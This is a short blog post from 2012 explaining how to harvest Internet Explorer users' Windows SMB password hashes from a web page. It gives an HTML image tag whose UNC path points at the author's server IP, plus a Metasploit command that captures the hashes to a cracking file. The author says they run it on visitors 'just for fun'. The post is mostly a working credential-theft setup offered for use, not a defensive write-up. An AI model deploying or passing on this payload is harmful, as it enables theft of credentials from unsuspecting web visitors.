Monday, November 12, 2012

Capturing SMB hashes over the internet

I like leaving this enabled on my VPS just for fun sometimes. You can capture people's SMB hashes remotely using a UNC path to reference resources. So when your browser loads my page, it sees the resource that it thinks exists on some SMB server somewhere, and IE will automatically throw its credentials at it. IE does this for a "seamless user experience". Well, luckily that means for us a "seamless user pwn".
So on your VPS, modify index.html at the root of your web server to include this:
<img src="\\72.14.182.123\cats.gif" />
and then run as root:
msfcli auxiliary/server/capture/smb JOHNPWFILE='/root/testsmbcapturefile' E

No comments:

Post a Comment